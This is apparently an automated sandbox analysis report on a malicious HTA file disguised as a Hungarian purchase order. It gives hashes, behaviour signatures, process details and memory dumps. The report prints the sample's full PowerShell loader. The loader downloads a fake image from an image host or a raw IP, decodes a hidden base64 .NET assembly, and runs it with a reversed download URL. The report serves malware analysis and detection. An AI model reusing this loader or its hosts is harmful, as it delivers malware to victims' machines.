Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    12-02-2024 17:56

General

  • Target

    Rendelés_(PO5042208)_Az Idumont.hta

  • Size

    9KB

  • MD5

    0766fff13fcd69232a01442507c7faaf

  • SHA1

    e559fef859f0da7dbb27ee0ee81b68f759b8772a

  • SHA256

    5f86822a5a049aaa09d6f11ad557f4c2ae8ce57b37daa6b00658fff4ee1ce090

  • SHA512

    ae8bc05b1233b8495f18a3f11ebbd2a5e2ad8345b3eed593ef4885a76eff74fa5f9a11f150b087dfea1fba9a29d0ae8ac8107d7da5de7e5abdf848a1c8b68988

  • SSDEEP

    192:sv0r6VP2SMNXVBVLkC6YWILLDFDNk6cl26nWc8t9embQV:sv0rwQvDwhMDxNkmV9embm

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Rendelés_(PO5042208)_Az Idumont.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/999/original/new_image.jpg?1707144651', 'http://45.74.19.84/xampp/bkp/bkp_hta.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('w5x8fgEv-w5YOBA!=yekhtua&99212%420139D0B4D360A9=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'C:\ProgramData\' , 'Name'))}}
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2136

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2104-2-0x0000000004030000-0x0000000004070000-memory.dmp

    Filesize

    256KB

  • memory/2104-1-0x0000000073300000-0x00000000738AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2104-0-0x0000000073300000-0x00000000738AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2104-3-0x0000000073300000-0x00000000738AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2136-6-0x00000000748C0000-0x0000000074E6B000-memory.dmp

    Filesize

    5.7MB

  • memory/2136-7-0x0000000002CF0000-0x0000000002D30000-memory.dmp

    Filesize

    256KB

  • memory/2136-8-0x00000000748C0000-0x0000000074E6B000-memory.dmp

    Filesize

    5.7MB

  • memory/2136-9-0x0000000002CF0000-0x0000000002D30000-memory.dmp

    Filesize

    256KB

  • memory/2136-10-0x0000000002CF0000-0x0000000002D30000-memory.dmp

    Filesize

    256KB

  • memory/2136-11-0x00000000748C0000-0x0000000074E6B000-memory.dmp

    Filesize

    5.7MB

  • memory/2136-12-0x00000000748C0000-0x0000000074E6B000-memory.dmp

    Filesize

    5.7MB

  • memory/2136-14-0x00000000748C0000-0x0000000074E6B000-memory.dmp

    Filesize

    5.7MB